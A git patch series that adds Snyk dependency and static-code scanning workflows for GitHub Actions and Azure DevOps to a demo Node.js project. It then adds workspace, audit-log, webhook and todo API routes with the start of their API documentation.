From 303709111d083b8c1fad4184b4fc9ce293a8e2e7 Mon Sep 17 00:00:00 2001 From: Phil Varner Date: Wed, 28 Jan 2026 09:25:19 -0500 Subject: [PATCH 1/7] Add Snyk SCA and SAST pipeline workflows for GitHub Actions and Azure DevOps --- .github/workflows/snyk-sca-sast-demo.yml | 198 +++++++++++++++++ azure-pipelines-snyk-sca-sast-demo.yml | 258 +++++++++++++++++++++++ 2 files changed, 456 insertions(+) create mode 100644 .github/workflows/snyk-sca-sast-demo.yml create mode 100644 azure-pipelines-snyk-sca-sast-demo.yml diff --git a/.github/workflows/snyk-sca-sast-demo.yml b/.github/workflows/snyk-sca-sast-demo.yml new file mode 100644 index 00000000000..347ba97c370 --- /dev/null +++ b/.github/workflows/snyk-sca-sast-demo.yml @@ -0,0 +1,198 @@ +name: Snyk SCA and SAST Security Pipeline + +# ============================================================================ +# TRIGGER CONFIGURATION +# ============================================================================ +# This workflow runs on: +# - Every push to main/master branches (typical for production deployments) +# - Pull requests targeting main/master (for pre-merge security validation) +# - Manual trigger via workflow_dispatch (for on-demand testing) +on: + push: + branches: [ main, master ] + pull_request: + branches: [ main, master ] + workflow_dispatch: + +# ============================================================================ +# SNYK OPEN SOURCE (SCA) SCAN JOB +# ============================================================================ +# Software Composition Analysis (SCA) scans your open-source dependencies +# for known vulnerabilities in third-party packages +jobs: + snyk-sca-scan: + name: Snyk Open Source (SCA) Scan + runs-on: ubuntu-latest + + # Required permissions for GitHub integration + permissions: + contents: read + security-events: write + + steps: + # Step 1: Check out the repository code + - name: Checkout code + uses: actions/checkout@v4 + + # Step 2: Set up Node.js environment (required for npm projects) + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: '18' + + # Step 3: Install project dependencies + # This ensures Snyk can analyze the actual dependency tree + - name: Install dependencies + run: npm install + + # Step 4: Install and configure Snyk CLI + - name: Setup Snyk CLI + uses: snyk/actions/setup@master + + # Step 5: Authenticate with Snyk using organization token + # SNYK_TOKEN should be configured as a GitHub secret + - name: Authenticate Snyk + run: snyk auth ${{ secrets.SNYK_TOKEN }} + env: + SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }} + + # Step 6: Run Snyk Open Source TEST + # This scans dependencies and BLOCKS the pipeline if high/critical vulns are found + # --severity-threshold=high: Only fail on high or critical severity issues + # --all-projects: Scan all package manager manifests in the repo + # + # BLOCKING MODE (COMMENTED OUT FOR DEMO) + # Uncomment the step below to enable pipeline blocking on high/critical vulnerabilities + # Remove 'continue-on-error: true' to enforce the block + # - name: Snyk Open Source Test (Block on High+) + # run: | + # snyk test \ + # --severity-threshold=high \ + # --all-projects \ + # --org=${{ secrets.SNYK_ORG_ID }} + # env: + # SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }} + + # MONITOR-ONLY MODE (CURRENTLY ACTIVE) + # This version runs the test but doesn't block the pipeline + - name: Snyk Open Source Test (Report Only) + continue-on-error: true + run: | + snyk test \ + --severity-threshold=high \ + --all-projects \ + --org=${{ secrets.SNYK_ORG_ID }} + env: + SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }} + + # Step 7: Run Snyk Open Source MONITOR + # This sends results to Snyk Dashboard for continuous monitoring + # Runs even if test fails (continue-on-error: true) + # --project-name: Custom name visible in Snyk UI + # --target-reference: Git branch/tag for tracking different environments + - name: Snyk Open Source Monitor (Send to Dashboard) + continue-on-error: true + run: | + snyk monitor \ + --all-projects \ + --org=${{ secrets.SNYK_ORG_ID }} \ + --project-name="nodejs-goof-sca" \ + --target-reference=${{ github.ref_name }} + env: + SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }} + +# ============================================================================ +# SNYK CODE (SAST) SCAN JOB +# ============================================================================ +# Static Application Security Testing (SAST) analyzes your first-party code +# for security vulnerabilities and code quality issues + snyk-code-scan: + name: Snyk Code (SAST) Scan + runs-on: ubuntu-latest + + # Required permissions for GitHub integration + permissions: + contents: read + security-events: write + + steps: + # Step 1: Check out the repository code + - name: Checkout code + uses: actions/checkout@v4 + + # Step 2: Install and configure Snyk CLI + - name: Setup Snyk CLI + uses: snyk/actions/setup@master + + # Step 3: Authenticate with Snyk using organization token + - name: Authenticate Snyk + run: snyk auth ${{ secrets.SNYK_TOKEN }} + env: + SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }} + + # Step 4: Run Snyk Code TEST + # This scans your source code and BLOCKS the pipeline if high/critical vulns are found + # --severity-threshold=high: Only fail on high or critical severity issues + # Snyk Code analyzes: JavaScript, TypeScript, Python, Java, C#, Go, PHP, Ruby, etc. + # + # BLOCKING MODE (COMMENTED OUT FOR DEMO) + # Uncomment the step below to enable pipeline blocking on high/critical vulnerabilities + # Remove 'continue-on-error: true' to enforce the block + # - name: Snyk Code Test (Block on High+) + # run: | + # snyk code test \ + # --severity-threshold=high \ + # --org=${{ secrets.SNYK_ORG_ID }} + # env: + # SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }} + + # MONITOR-ONLY MODE (CURRENTLY ACTIVE) + # This version runs the test but doesn't block the pipeline + - name: Snyk Code Test (Report Only) + continue-on-error: true + run: | + snyk code test \ + --severity-threshold=high \ + --org=${{ secrets.SNYK_ORG_ID }} + env: + SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }} + + # Step 5: Run Snyk Code MONITOR (using snyk monitor with --unmanaged flag) + # This sends SAST results to Snyk Dashboard for continuous monitoring + # Note: Snyk Code results are included when using 'snyk monitor' + # --project-name: Custom name visible in Snyk UI + # --target-reference: Git branch/tag for tracking + - name: Snyk Code Monitor (Send to Dashboard) + continue-on-error: true + run: | + snyk monitor \ + --org=${{ secrets.SNYK_ORG_ID }} \ + --project-name="nodejs-goof-sast" \ + --target-reference=${{ github.ref_name }} + env: + SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }} + +# ============================================================================ +# REQUIRED GITHUB SECRETS +# ============================================================================ +# To use this pipeline, configure these secrets in your GitHub repository: +# Settings > Secrets and variables > Actions > New repository secret +# +# 1. SNYK_TOKEN: Your Snyk API token +# - Get from: https://app.snyk.io/account (Account Settings > API Token) +# - Format: UUID string (e.g., 12345678-1234-1234-1234-123456789abc) +# +# 2. SNYK_ORG_ID: Your Snyk Organization ID (optional but recommended) +# - Get from: https://app.snyk.io/org/YOUR_ORG/manage/settings +# - Format: UUID string or organization slug +# - If not set, uses your default organization +# +# ============================================================================ +# DEMO TALKING POINTS +# ============================================================================ +# 1. SHIFT-LEFT SECURITY: Scans run on every commit and PR before merge +# 2. DUAL SCANNING: Both SCA (dependencies) and SAST (your code) in one pipeline +# 3. FAIL-FAST: Pipeline blocks on high/critical vulnerabilities +# 4. CONTINUOUS MONITORING: Results sent to Snyk Dashboard for tracking over time +# 5. DEVELOPER FRIENDLY: Clear feedback in PR checks and GitHub Actions UI +# 6. CUSTOMIZABLE: Adjust severity thresholds, add more Snyk scans (Container, IaC) diff --git a/azure-pipelines-snyk-sca-sast-demo.yml b/azure-pipelines-snyk-sca-sast-demo.yml new file mode 100644 index 00000000000..6840b592c29 --- /dev/null +++ b/azure-pipelines-snyk-sca-sast-demo.yml @@ -0,0 +1,258 @@ +# ============================================================================ +# AZURE DEVOPS PIPELINE - SNYK SCA AND SAST SECURITY SCANNING +# ============================================================================ +# This pipeline performs Software Composition Analysis (SCA) and +# Static Application Security Testing (SAST) using Snyk +# +# IMPORTANT: This is the Azure DevOps/TFS equivalent of the GitHub Actions workflow +# Key differences from GitHub Actions: +# - Uses 'trigger' instead of 'on' +# - Uses 'jobs' with 'steps' instead of GitHub Actions syntax +# - Uses 'script' or 'task' instead of 'run' +# - Variables are defined differently +# - Secrets accessed via $(VARIABLE_NAME) instead of ${{ secrets.NAME }} + +# ============================================================================ +# TRIGGER CONFIGURATION +# ============================================================================ +# This pipeline runs on: +# - Every push to main/master branches (CI trigger) +# - Pull requests targeting main/master (PR validation) +# - Manual trigger via Azure DevOps UI +trigger: + branches: + include: + - main + - master + +pr: + branches: + include: + - main + - master + +# ============================================================================ +# PIPELINE VARIABLES +# ============================================================================ +# Define variables used throughout the pipeline +# SNYK_TOKEN should be configured as a secret variable in Azure DevOps: +# Pipeline > Edit > Variables > New variable > Keep this value secret +variables: + nodeVersion: '18.x' + # SNYK_TOKEN: Configured as secret variable in Azure DevOps + # SNYK_ORG_ID: Configured as variable in Azure DevOps (optional) + +# ============================================================================ +# AGENT POOL CONFIGURATION +# ============================================================================ +# Specifies the build agent to use (equivalent to 'runs-on' in GitHub Actions) +pool: + vmImage: 'ubuntu-latest' + +# ============================================================================ +# PIPELINE STAGES AND JOBS +# ============================================================================ +stages: + # ========================================================================== + # STAGE 1: SNYK OPEN SOURCE (SCA) SCAN + # ========================================================================== + # Software Composition Analysis (SCA) scans your open-source dependencies + # for known vulnerabilities in third-party packages + - stage: SnykSCA + displayName: 'Snyk Open Source (SCA) Scan' + jobs: + - job: SCA_Scan + displayName: 'SCA Security Scan' + steps: + # Step 1: Check out the repository code + - checkout: self + displayName: 'Checkout code' + + # Step 2: Set up Node.js environment (required for npm projects) + - task: NodeTool@0 + displayName: 'Setup Node.js' + inputs: + versionSpec: '$(nodeVersion)' + + # Step 3: Install project dependencies + # This ensures Snyk can analyze the actual dependency tree + - script: npm install + displayName: 'Install dependencies' + + # Step 4: Install Snyk CLI + # Azure DevOps doesn't have a built-in Snyk action, so we install via npm + - script: npm install -g snyk + displayName: 'Install Snyk CLI' + + # Step 5: Authenticate with Snyk using organization token + # SNYK_TOKEN should be configured as a secret variable in Azure DevOps + - script: snyk auth $(SNYK_TOKEN) + displayName: 'Authenticate Snyk' + env: + SNYK_TOKEN: $(SNYK_TOKEN) + + # Step 6: Run Snyk Open Source TEST + # This scans dependencies and BLOCKS the pipeline if high/critical vulns are found + # --severity-threshold=high: Only fail on high or critical severity issues + # --all-projects: Scan all package manager manifests in the repo + # + # BLOCKING MODE (COMMENTED OUT FOR DEMO) + # Uncomment the script below to enable pipeline blocking on high/critical vulnerabilities + # Remove 'continueOnError: true' to enforce the block + # - script: | + # snyk test \ + # --severity-threshold=high \ + # --all-projects \ + # --org=$(SNYK_ORG_ID) + # displayName: 'Snyk Open Source Test (Block on High+)' + # env: + # SNYK_TOKEN: $(SNYK_TOKEN) + + # MONITOR-ONLY MODE (CURRENTLY ACTIVE) + # This version runs the test but doesn't block the pipeline + - script: | + snyk test \ + --severity-threshold=high \ + --all-projects \ + --org=$(SNYK_ORG_ID) || true + displayName: 'Snyk Open Source Test (Report Only)' + continueOnError: true + env: + SNYK_TOKEN: $(SNYK_TOKEN) + + # Step 7: Run Snyk Open Source MONITOR + # This sends results to Snyk Dashboard for continuous monitoring + # Runs even if test fails (continueOnError: true) + # --project-name: Custom name visible in Snyk UI + # --target-reference: Git branch/tag for tracking different environments + - script: | + snyk monitor \ + --all-projects \ + --org=$(SNYK_ORG_ID) \ + --project-name="nodejs-goof-sca" \ + --target-reference=$(Build.SourceBranchName) + displayName: 'Snyk Open Source Monitor (Send to Dashboard)' + continueOnError: true + env: + SNYK_TOKEN: $(SNYK_TOKEN) + + # ========================================================================== + # STAGE 2: SNYK CODE (SAST) SCAN + # ========================================================================== + # Static Application Security Testing (SAST) analyzes your first-party code + # for security vulnerabilities and code quality issues + - stage: SnykCode + displayName: 'Snyk Code (SAST) Scan' + dependsOn: [] # Run in parallel with SCA stage + jobs: + - job: SAST_Scan + displayName: 'SAST Security Scan' + steps: + # Step 1: Check out the repository code + - checkout: self + displayName: 'Checkout code' + + # Step 2: Install Snyk CLI + - script: npm install -g snyk + displayName: 'Install Snyk CLI' + + # Step 3: Authenticate with Snyk using organization token + - script: snyk auth $(SNYK_TOKEN) + displayName: 'Authenticate Snyk' + env: + SNYK_TOKEN: $(SNYK_TOKEN) + + # Step 4: Run Snyk Code TEST + # This scans your source code and BLOCKS the pipeline if high/critical vulns are found + # --severity-threshold=high: Only fail on high or critical severity issues + # Snyk Code analyzes: JavaScript, TypeScript, Python, Java, C#, Go, PHP, Ruby, etc. + # + # BLOCKING MODE (COMMENTED OUT FOR DEMO) + # Uncomment the script below to enable pipeline blocking on high/critical vulnerabilities + # Remove 'continueOnError: true' to enforce the block + # - script: | + # snyk code test \ + # --severity-threshold=high \ + # --org=$(SNYK_ORG_ID) + # displayName: 'Snyk Code Test (Block on High+)' + # env: + # SNYK_TOKEN: $(SNYK_TOKEN) + + # MONITOR-ONLY MODE (CURRENTLY ACTIVE) + # This version runs the test but doesn't block the pipeline + - script: | + snyk code test \ + --severity-threshold=high \ + --org=$(SNYK_ORG_ID) || true + displayName: 'Snyk Code Test (Report Only)' + continueOnError: true + env: + SNYK_TOKEN: $(SNYK_TOKEN) + + # Step 5: Run Snyk Code MONITOR + # This sends SAST results to Snyk Dashboard for continuous monitoring + # Note: Snyk Code results are included when using 'snyk monitor' + # --project-name: Custom name visible in Snyk UI + # --target-reference: Git branch/tag for tracking + - script: | + snyk monitor \ + --org=$(SNYK_ORG_ID) \ + --project-name="nodejs-goof-sast" \ + --target-reference=$(Build.SourceBranchName) + displayName: 'Snyk Code Monitor (Send to Dashboard)' + continueOnError: true + env: + SNYK_TOKEN: $(SNYK_TOKEN) + +# ============================================================================ +# REQUIRED AZURE DEVOPS VARIABLES +# ============================================================================ +# To use this pipeline, configure these variables in Azure DevOps: +# Pipeline > Edit > Variables > New variable +# +# 1. SNYK_TOKEN (SECRET): Your Snyk API token +# - Get from: https://app.snyk.io/account (Account Settings > API Token) +# - Format: UUID string (e.g., 12345678-1234-1234-1234-123456789abc) +# - IMPORTANT: Check "Keep this value secret" when creating the variable +# +# 2. SNYK_ORG_ID (OPTIONAL): Your Snyk Organization ID +# - Get from: https://app.snyk.io/org/YOUR_ORG/manage/settings +# - Format: UUID string or organization slug +# - If not set, uses your default organization +# +# ============================================================================ +# KEY DIFFERENCES FROM GITHUB ACTIONS +# ============================================================================ +# 1. SYNTAX: +# - GitHub: 'on:' → Azure DevOps: 'trigger:' and 'pr:' +# - GitHub: 'jobs:' → Azure DevOps: 'stages:' and 'jobs:' +# - GitHub: 'runs-on:' → Azure DevOps: 'pool:' +# - GitHub: 'steps: - name:' → Azure DevOps: 'steps: - script:' or 'task:' +# +# 2. SECRETS: +# - GitHub: ${{ secrets.SNYK_TOKEN }} → Azure DevOps: $(SNYK_TOKEN) +# - Configured in: Pipeline > Variables (not repository secrets) +# +# 3. CONTEXT VARIABLES: +# - GitHub: ${{ github.ref_name }} → Azure DevOps: $(Build.SourceBranchName) +# - GitHub: ${{ github.sha }} → Azure DevOps: $(Build.SourceVersion) +# +# 4. ACTIONS vs TASKS: +# - GitHub uses pre-built actions (e.g., actions/checkout@v4) +# - Azure DevOps uses tasks or direct script commands +# - No native Snyk task, so we use 'npm install -g snyk' +# +# 5. PARALLEL EXECUTION: +# - GitHub: Jobs run in parallel by default +# - Azure DevOps: Use 'dependsOn: []' to run stages in parallel +# +# ============================================================================ +# DEMO TALKING POINTS +# ============================================================================ +# 1. SHIFT-LEFT SECURITY: Scans run on every commit and PR before merge +# 2. DUAL SCANNING: Both SCA (dependencies) and SAST (your code) in one pipeline +# 3. FAIL-FAST: Pipeline blocks on high/critical vulnerabilities (when enabled) +# 4. CONTINUOUS MONITORING: Results sent to Snyk Dashboard for tracking over time +# 5. DEVELOPER FRIENDLY: Clear feedback in PR checks and Azure DevOps UI +# 6. CROSS-PLATFORM: Works with Azure DevOps Server (TFS) and Azure DevOps Services +# 7. CUSTOMIZABLE: Adjust severity thresholds, add more Snyk scans (Container, IaC) From 7cf9dade6f2264e742a4624b378ca6774a590a69 Mon Sep 17 00:00:00 2001 From: Phil Varner Date: Wed, 28 Jan 2026 09:35:16 -0500 Subject: [PATCH 2/7] Fix SCA project name and clarify SAST monitoring behavior --- .github/workflows/snyk-sca-sast-demo.yml | 24 +++++++----------------- 1 file changed, 7 insertions(+), 17 deletions(-) diff --git a/.github/workflows/snyk-sca-sast-demo.yml b/.github/workflows/snyk-sca-sast-demo.yml index 347ba97c370..75a06c58319 100644 --- a/.github/workflows/snyk-sca-sast-demo.yml +++ b/.github/workflows/snyk-sca-sast-demo.yml @@ -21,7 +21,7 @@ on: # for known vulnerabilities in third-party packages jobs: snyk-sca-scan: - name: Snyk Open Source (SCA) Scan + name: SCA - Snyk Open Source Scan runs-on: ubuntu-latest # Required permissions for GitHub integration @@ -94,7 +94,6 @@ jobs: continue-on-error: true run: | snyk monitor \ - --all-projects \ --org=${{ secrets.SNYK_ORG_ID }} \ --project-name="nodejs-goof-sca" \ --target-reference=${{ github.ref_name }} @@ -107,7 +106,7 @@ jobs: # Static Application Security Testing (SAST) analyzes your first-party code # for security vulnerabilities and code quality issues snyk-code-scan: - name: Snyk Code (SAST) Scan + name: SAST - Snyk Code Scan runs-on: ubuntu-latest # Required permissions for GitHub integration @@ -157,20 +156,11 @@ jobs: env: SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }} - # Step 5: Run Snyk Code MONITOR (using snyk monitor with --unmanaged flag) - # This sends SAST results to Snyk Dashboard for continuous monitoring - # Note: Snyk Code results are included when using 'snyk monitor' - # --project-name: Custom name visible in Snyk UI - # --target-reference: Git branch/tag for tracking - - name: Snyk Code Monitor (Send to Dashboard) - continue-on-error: true - run: | - snyk monitor \ - --org=${{ secrets.SNYK_ORG_ID }} \ - --project-name="nodejs-goof-sast" \ - --target-reference=${{ github.ref_name }} - env: - SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }} + # Step 5: Snyk Code Results Automatically Sent to Dashboard + # IMPORTANT: Snyk Code (SAST) does NOT use 'snyk monitor' + # The 'snyk code test' command above automatically sends results to the Snyk Dashboard + # No separate monitor step is needed for SAST - results appear in the Code Analysis section + # You can view them at: https://app.snyk.io/org/YOUR_ORG/projects (filter by "Code analysis") # ============================================================================ # REQUIRED GITHUB SECRETS From 416192aa9bef73e9531f80fea9a09149ff4a6dd8 Mon Sep 17 00:00:00 2001 From: Phil Varner Date: Wed, 28 Jan 2026 10:05:48 -0500 Subject: [PATCH 3/7] Add --report flag to SCA and SAST scans to persist results to Snyk Dashboard --- .github/workflows/snyk-sca-sast-demo.yml | 57 +++++++++++------------- 1 file changed, 27 insertions(+), 30 deletions(-) diff --git a/.github/workflows/snyk-sca-sast-demo.yml b/.github/workflows/snyk-sca-sast-demo.yml index 75a06c58319..8bddba28f17 100644 --- a/.github/workflows/snyk-sca-sast-demo.yml +++ b/.github/workflows/snyk-sca-sast-demo.yml @@ -68,33 +68,25 @@ jobs: # run: | # snyk test \ # --severity-threshold=high \ - # --all-projects \ - # --org=${{ secrets.SNYK_ORG_ID }} + # --report \ + # --org=2c2549f7-de55-4c31-aaea-bea685244487 \ + # --project-name="nodejs-goof-sca" \ + # --target-reference=${{ github.ref_name }} # env: # SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }} - # MONITOR-ONLY MODE (CURRENTLY ACTIVE) - # This version runs the test but doesn't block the pipeline - - name: Snyk Open Source Test (Report Only) - continue-on-error: true - run: | - snyk test \ - --severity-threshold=high \ - --all-projects \ - --org=${{ secrets.SNYK_ORG_ID }} - env: - SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }} - - # Step 7: Run Snyk Open Source MONITOR - # This sends results to Snyk Dashboard for continuous monitoring - # Runs even if test fails (continue-on-error: true) + # REPORT-ONLY MODE (CURRENTLY ACTIVE) + # This version runs the test, reports to dashboard, but doesn't block the pipeline + # --report: Sends results to Snyk Dashboard for continuous monitoring # --project-name: Custom name visible in Snyk UI # --target-reference: Git branch/tag for tracking different environments - - name: Snyk Open Source Monitor (Send to Dashboard) + - name: Snyk Open Source Test & Report (Send to Dashboard) continue-on-error: true run: | - snyk monitor \ - --org=${{ secrets.SNYK_ORG_ID }} \ + snyk test \ + --severity-threshold=high \ + --report \ + --org=2c2549f7-de55-4c31-aaea-bea685244487 \ --project-name="nodejs-goof-sca" \ --target-reference=${{ github.ref_name }} env: @@ -141,26 +133,31 @@ jobs: # run: | # snyk code test \ # --severity-threshold=high \ - # --org=${{ secrets.SNYK_ORG_ID }} + # --report \ + # --org=2c2549f7-de55-4c31-aaea-bea685244487 \ + # --project-name="nodejs-goof-sast" # env: # SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }} - # MONITOR-ONLY MODE (CURRENTLY ACTIVE) - # This version runs the test but doesn't block the pipeline - - name: Snyk Code Test (Report Only) + # REPORT-ONLY MODE (CURRENTLY ACTIVE) + # This version runs the test, reports to dashboard, but doesn't block the pipeline + # --report: Sends SAST results to Snyk Dashboard for continuous monitoring + # --project-name: Custom name visible in Snyk UI (required for --report) + - name: Snyk Code Test & Report (Send to Dashboard) continue-on-error: true run: | snyk code test \ --severity-threshold=high \ - --org=${{ secrets.SNYK_ORG_ID }} + --report \ + --org=2c2549f7-de55-4c31-aaea-bea685244487 \ + --project-name="nodejs-goof-sast" env: SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }} - # Step 5: Snyk Code Results Automatically Sent to Dashboard - # IMPORTANT: Snyk Code (SAST) does NOT use 'snyk monitor' - # The 'snyk code test' command above automatically sends results to the Snyk Dashboard - # No separate monitor step is needed for SAST - results appear in the Code Analysis section - # You can view them at: https://app.snyk.io/org/YOUR_ORG/projects (filter by "Code analysis") + # Step 5: SAST Results Sent to Dashboard + # The --report flag above sends Snyk Code results to the Snyk Dashboard + # Results will appear at: https://app.snyk.io/org/varner-tech-engineering/projects + # Look for project name: nodejs-goof-sast # ============================================================================ # REQUIRED GITHUB SECRETS From 8eab18651bbe3e613418f8d0d661e32c81b131be Mon Sep 17 00:00:00 2001 From: Phil Varner Date: Fri, 27 Feb 2026 08:27:11 -0700 Subject: [PATCH 4/7] Add workspace management, API routes, and supporting services Introduce multi-workspace support with role-based access control, audit logging, webhook delivery, rule engine with scheduled execution, CSV todo import, and notes CRUD. Adds new Mongoose models (Workspace, WorkspaceMember, AuditEvent, Webhook, WebhookDelivery, Rule, Note), API middleware, and supporting documentation. Made-with: Cursor --- .gitignore | 3 + app.js | 14 +- docs/API.md | 374 + docs/ARCHITECTURE-WORKSPACES.md | 42 + docs/container-report-test.html | 35256 +++++++++++++++++++++++ docs/container-scan-email-draft.txt | 23 + docs/snyk-dashboard-upload-commands.md | 69 + docs/snyk-html-reports-email-draft.txt | 33 + docs/snyk-html-reports-email-keith.txt | 68 + docs/snyk-upload-email-draft.txt | 14 + middleware/api-auth.js | 39 + mongoose-db.js | 95 +- package-lock.json | 361 +- package.json | 3 + routes/api.js | 20 + routes/audit.js | 100 + routes/index.js | 44 + routes/rules.js | 213 + routes/todo-import.js | 277 + routes/webhooks.js | 122 + routes/workspace-todos.js | 300 + routes/workspaces.js | 259 + routes/xss-vulnerable.js | 19 +- sbom-cyclonedx.json | 2 + sbom-errors.txt | 0 scripts/audit-retention.js | 23 + services/audit.js | 36 + services/rule-engine.js | 196 + services/webhook-delivery.js | 205 + services/workspace-auth.js | 73 + 30 files changed, 38205 insertions(+), 78 deletions(-) create mode 100644 docs/API.md create mode 100644 docs/ARCHITECTURE-WORKSPACES.md create mode 100644 docs/container-report-test.html create mode 100644 docs/container-scan-email-draft.txt create mode 100644 docs/snyk-dashboard-upload-commands.md create mode 100644 docs/snyk-html-reports-email-draft.txt create mode 100644 docs/snyk-html-reports-email-keith.txt create mode 100644 docs/snyk-upload-email-draft.txt create mode 100644 middleware/api-auth.js create mode 100644 routes/api.js create mode 100644 routes/audit.js create mode 100644 routes/rules.js create mode 100644 routes/todo-import.js create mode 100644 routes/webhooks.js create mode 100644 routes/workspace-todos.js create mode 100644 routes/workspaces.js create mode 100644 sbom-cyclonedx.json create mode 100644 sbom-errors.txt create mode 100644 scripts/audit-retention.js create mode 100644 services/audit.js create mode 100644 services/rule-engine.js create mode 100644 services/webhook-delivery.js create mode 100644 services/workspace-auth.js diff --git a/.gitignore b/.gitignore index a6ab4d1fc9a..e2b9622bd2a 100644 --- a/.gitignore +++ b/.gitignore @@ -19,3 +19,6 @@ npm-debug.log # Snyk Security Extension - AI Rules (auto-generated) .github/instructions/snyk_rules.instructions.md + +# Snyk Security Extension - AI Rules (auto-generated) +.cursor/rules/snyk_rules.mdc diff --git a/app.js b/app.js index 9d341aa3554..53000b30ef4 100644 --- a/app.js +++ b/app.js @@ -26,8 +26,12 @@ var cons = require('consolidate'); const hbs = require('hbs') var app = express(); -var routes = require('./routes');; -var routesUsers = require('./routes/users.js') +var routes = require('./routes'); +var routesUsers = require('./routes/users.js'); +var todoImport = require('./routes/todo-import'); +var apiRoutes = require('./routes/api'); +var apiAuth = require('./middleware/api-auth'); +var ruleEngine = require('./services/rule-engine'); // all environments app.set('port', process.env.PORT || 3001); @@ -62,10 +66,15 @@ app.get('/destroy/:id', routes.destroy); app.get('/edit/:id', routes.edit); app.post('/update/:id', routes.update); app.post('/import', routes.import); +app.post('/todos/import/csv', todoImport.uploadMiddleware, todoImport.importCsv); +app.get('/todos/import/:jobId/status', todoImport.importStatus); +app.use('/api', apiAuth.setApiUser, apiRoutes); app.get('/about_new', routes.about_new); app.get('/chat', routes.chat.get); app.put('/chat', routes.chat.add); app.delete('/chat', routes.chat.delete); +app.post('/notes', routes.createNote); +app.get('/notes/:id', routes.getNote); app.use('/users', routesUsers) // Static @@ -85,4 +94,5 @@ console.log('token: ' + token); http.createServer(app).listen(app.get('port'), function () { console.log('Express server listening on port ' + app.get('port')); + ruleEngine.startScheduler(); }); diff --git a/docs/API.md b/docs/API.md new file mode 100644 index 00000000000..466df06fd07 --- /dev/null +++ b/docs/API.md @@ -0,0 +1,374 @@ +# Todo Workspace & Automation API + +Base URL: `/api`. All endpoints require a **current user**: set the `X-User-Id` header (e.g. to an email or user id) or use session-based login. Unauthenticated requests receive `401`. + +--- + +## Authentication + +- **Header:** `X-User-Id: your-user-id-or-email` +- **Session:** If you have logged in via the app (e.g. `/login`), the session user is used when the header is not set. + +--- + +## Workspaces + +### Create workspace + +`POST /api/workspaces` + +**Body:** + +```json +{ + "name": "My Workspace", + "slug": "my-workspace" +} +``` + +- `slug` is optional; if omitted it is derived from `name` (URL-safe, lowercase). Must be unique. + +**Response:** `201` + workspace object (`id`, `name`, `slug`, `createdAt`, `settings`). Caller becomes **owner**. + +--- + +### List workspaces + +`GET /api/workspaces` + +Returns workspaces the current user is a member of, with `role` per workspace. + +**Response:** + +```json +{ + "workspaces": [ + { + "id": "...", + "name": "My Workspace", + "slug": "my-workspace", + "createdAt": "...", + "settings": {}, + "role": "owner" + } + ] +} +``` + +--- + +### Get one workspace + +`GET /api/workspaces/:id` + +Members only. `:id` is the workspace ObjectId. + +**Response:** Workspace object. + +--- + +### Update workspace + +`PATCH /api/workspaces/:id` + +**Body:** `name` (string), `settings` (object). Owner or admin only. + +**Response:** Updated workspace object. + +--- + +### Add member + +`POST /api/workspaces/:id/members` + +**Body:** + +```json +{ + "user": "user@example.com", + "role": "member" +} +``` + +- `role`: `admin` | `member` | `viewer`. Owner or admin only. + +**Response:** `201` + `{ id, workspace, user, role }`. + +--- + +### Remove member + +`DELETE /api/workspaces/:id/members/:userId` + +Owner or admin only. Owner cannot remove themselves (transfer ownership first). + +**Response:** `204`. + +--- + +## Workspace-scoped Todos + +All under `GET/POST /api/workspaces/:workspaceId/todos` and `GET/PATCH/DELETE /api/workspaces/:workspaceId/todos/:id`. Require workspace membership; viewers can only read. + +### List todos + +`GET /api/workspaces/:workspaceId/todos` + +**Query:** + +| Param | Type | Description | +|------------|--------|--------------------------------------------------| +| `page` | number | Page (default 1) | +| `limit` | number | Page size (default 20, max 100) | +| `sort` | string | `updated_at`, `-updated_at`, `due_date`, `-due_date`, `priority`, `-priority` | +| `priority` | string | `low` \| `medium` \| `high` | +| `tags` | string | Comma-separated; todos must have all tags | +| `dueBefore`| ISO8601| due_date < value | +| `dueAfter` | ISO8601| due_date > value | +| `search` | string | Plain text search in content | + +**Response:** + +```json +{ + "todos": [ + { + "id": "...", + "content": "...", + "due_date": "...", + "priority": "high", + "tags": ["a", "b"], + "updated_at": "...", + "workspace": "..." + } + ], + "meta": { "total": 42, "page": 1, "limit": 20 } +} +``` + +--- + +### Create todo + +`POST /api/workspaces/:workspaceId/todos` + +**Body:** + +```json +{ + "content": "Task description", + "due_date": "2025-12-31T23:59:59.000Z", + "priority": "high", + "tags": ["urgent", "work"] +} +``` + +- `content` required; `due_date`, `priority`, `tags` optional. + +**Response:** `201` + todo object. + +--- + +### Get one todo + +`GET /api/workspaces/:workspaceId/todos/:id` + +**Response:** Todo object. + +--- + +### Update todo (partial) + +`PATCH /api/workspaces/:workspaceId/todos/:id` + +**Body:** Any of `content`, `due_date`, `priority`, `tags`. + +**Response:** Updated todo object. + +--- + +### Delete todo + +`DELETE /api/workspaces/:workspaceId/todos/:id` + +Soft delete (sets `deleted_at`). Response: `204`. + +--- + +## Audit log + +### List audit events + +`GET /api/workspaces/:workspaceId/audit` + +**Query:** + +| Param | Type | Description | +|----------------|--------|--------------------------------| +| `action` | string | e.g. `todo.created` | +| `resourceType` | string | `todo` \| `workspace` \| `member` | +| `actor` | string | User id | +| `from` | ISO8601| createdAt >= from | +| `to` | ISO8601| createdAt <= to | +| `page` | number | Default 1 | +| `limit` | number | Default 50, max 100 | + +**Response:** + +```json +{ + "events": [ + { + "id": "...", + "workspace": "...", + "actor": "user@example.com", + "action": "todo.created", + "resourceType": "todo", + "resourceId": "...", + "details": {}, + "ip": "...", + "createdAt": "..." + } + ], + "meta": { "total": 100, "page": 1, "limit": 50 } +} +``` + +Newest first. + +--- + +## Webhooks + +Owner or admin only. + +### Create webhook + +`POST /api/workspaces/:workspaceId/webhooks` + +**Body:** + +```json +{ + "url": "https://example.com/webhook", + "secret": "optional-secret-for-hmac", + "events": ["todo.created", "todo.updated"], + "active": true +} +``` + +- `events`: array of event names. Default: all (`todo.created`, 